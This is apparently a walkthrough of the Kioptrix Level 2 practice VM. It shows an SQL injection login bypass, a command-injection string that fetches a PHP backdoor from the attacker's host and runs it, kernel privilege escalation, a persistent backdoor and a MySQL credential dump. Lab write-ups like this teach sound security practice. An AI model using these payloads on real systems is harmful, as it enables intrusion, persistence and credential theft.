Watch video on-line: http://g0tmi1k.blip.tv/file/4760142/
Download video: http://www.mediafire.com/?f3hbmtdt44t44v3
Time for level 2! =) [See here for level 1]. Like before, kioptrix is another “Vulnerable-By-Design OS” (De-ICE, Metasploitable and pWnOS), with the aim to go from "boot" to "root" by any means possible.
This video demonstrates how code being injected into a web page results in the machine becoming compromised. The attacker afterwards then starts exploring the system for further pieces of information.
* Scan network for hosts (Nmap)
* Bypass login screen (MySQL Injection)
* Local command execution (PHP Injection)
* Upload a backdoor (PHP Meterpreter)
* Gain root access (ip_append_data() local ring0 root exploit)
* Game Over
* Enable access to MySQL database (MySQL Injection)
* Gather information (history and user credentials)
What do I need?
* Kioptrix - Level 2 VM. Download here (Mirror: Part 1 MD5:CF25057866E4BEA4F05651ACC222E3AE, Part 2 MD5:1ADCE0A6AFE4EE2FADD82F9EE3878AED, Part 3 MD5:A8012648FAB73746CE4E3250E0D66291)
* VMware player OR workstation. Download here
* Nmap – (Can be found on BackTrack 4-R2). Download here
* Metasploit – (Can be found on BackTrack 4-R2)
* Internet Browser – (Firefox can be found on BackTrack 4-R2)
* A Text Editor – (Kate can be found on BackTrack 4-R2)
* ip_append_data() ring0 Root Exploit – (Can be found on exploit-db.com)
* MySQL – (Can be found on BackTrack 4-R2)
Walk through *Due to the forums security, I'm unable to post the complete walk through*
After starting the network services and obtaining an IP address (192.168.0.33), the attacker does a quick nmap scan to show what host are currently "alive" on the network. After a target IP is known the attacker proceeds to do a more detailed scan on the target (192.168.0.202). By doing this, nmap shows what possible services (ports) the target has running and the version of the service and then attempts to identify the operating system (OS). The result of this shows:
* OS: Linux v2.6.x (2.6.9-30)
* Port 80 - Web Server: Apache httpd 2.0.52 (CentOS)
The attacker navigates to the web server and is presented with a login page. The attacker chooses to enter a 'standard administrator's user name'("admin") as the user name and instead of entering a valid password uses some “MySQL injection code”. This "password" will cause the original MySQL statement returning true, therefore it will login as the chosen user without the correct password being present. The vulnerable code is as follows:
* Original command
$query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
* Expected input (user: admin, Password: 5afac8d85f):
$query = "SELECT * FROM users WHERE username = 'admin' AND password='5afac8d85f'";
* "Injected" input (user: admin, Password: ' OR 1=1 -- -):
$query = "SELECT * FROM users WHERE username = 'admin' AND password='' OR 1=1 -- -'";
This works because the attacker has asked to login as "admin" and because the MySQL command is looking either for: "password" OR "1=1" to match. Because 1 will ALWAYS be 1, the statement will return true, therefore allowing the attacker to login as admin. The code at the end " -- -", comments out the rest of the query which means that the rest of the query is ignored so the attacker does not have to worry about fixing the syntax.
The attacker is then looking at the admin panel, which allows the admin to "ping" other computers attached to the network from the server location. The attacker notices that the web pages has a "php" file extension and guesses that the server supports PHP and wonders if meterpreter agent would be able to execute. The attacker creates a "php meterpreter backdoor file" and sets up a metasploit to interact with the backdoor. The attacker starts a web server which is used to host the backdoor.
The attacker now needs to transfer the backdoor onto the server allowing them to be able to gain a remote access on the system. As mentioned before the admin panel allows admins to "ping". The attacker then tries to inject in the php file to run other commands instead. The vulnerable code is as follows:
* Original command
echo shll_exec( 'ping -c 3 ' . $target );
* Expected input (ip: 192.168.0.1):
echo shll_exec( 'ping -c 3 ' . 192.168.0.1 );
* "Injected" input (ip: ; ** /*** && **** -O bd.php 192.168.0.33/backdoor.php.txt && php -f bd.php):
echo shll_exec( 'ping -c 3 ' . ; ** /*** && **** -O bd.php 192.168.0.33/backdoor.php.txt && php -f bd.php );
The coded uses “shll_exec” allows to: "Execute command via shell and return the complete output as a string". The ping command is hard-coded in at the start, however because the ping command requires an IP address to be successfully executed it fails to receive therefore it also fails to execute. Instead the attacker has used ";" which allows for commands to be executed sequentially regardless of outcome (e.g. multiple commands on the same line), which means the PHP code continues to run the attackers command even though “ping” failed. The attacker has "asked" to:
* Change directory to "/***" as this is writeable for the exploited user "apache".
* Download the content of a web page (which is the backdoor), rename it to a shorter filename and change the file extension.
* Then execute the code.
The attacker checks that a session has been created in metasploit and interacts with it. The result being that the attacker now has a remote shell on the target system.
However the exploited service (PHP) is using a user that has limited access to the system and the attacker would like more (plus the objective of kioptrix is to gain access to the superuser, "root"). The attacker makes a note of the targets system's kernel version and searches for an exploit that could lead to "privilege escalation" which would allow for “deeper access” into the system. After searching for known exploits the attacker identifies an exploit that is compatible with the target's system. The attacker downloads a copy of the exploit and transfers it using the same method as the backdoor previously. After successfully compiling the exploit, the attacker runs the exploit on the target's success which results in the attacker being promoted to the "root" account. The attacker then creates a copy of the backdoor file in the "document root". The attacker then kills the remote shell. (Note: The end goal of kioptrix has been reached and everything after copying the backdoor is optional).
As the login page requires login details, which need to be stored somewhere the attacker decides to locate these pieces of information. The attacker starts by viewing the source code of the login page for clues as these details could be; hard-coded into the source, use another file to handle this function or use a database.
Once the attacker identities that the login page uses a MySQL database which contains the login details, the attacker wants to discover what else is stored in the database. As the login page relies on the database, the login page will contain a username and password in which to access it. The attacker uses a copy the login details plus as the attacker can executed commands, they use this to their advantage by command line interaction with MySQL database.
The attacker starts off viewing all the databases which are stored in MySQL, and spots the table "MySQL" which might contain some 'interesting' details! The attacker moves on to seeing what tables are in the database, which brings up a table called "users". After selecting everything in the table the attacker spots that the "root" user has the same hash (hence same password) as the user "john" (which they are currently using).
The attacker can keep using the current system to interact with the database; however allowing direct command line access from their machine would be 'easier'. So the attacker goes about reconfiguring MySQL to allow this. Currently the only allowed access is from the local machine itself(localhost/127.0.0.1), therefore no external communication is allowed (as seen by the "nmap" & "MySQL"). However as the attacker can execute commands locally it "grants all privileges" to the user "root" on the attackers IP (which still protects access from everyone else!).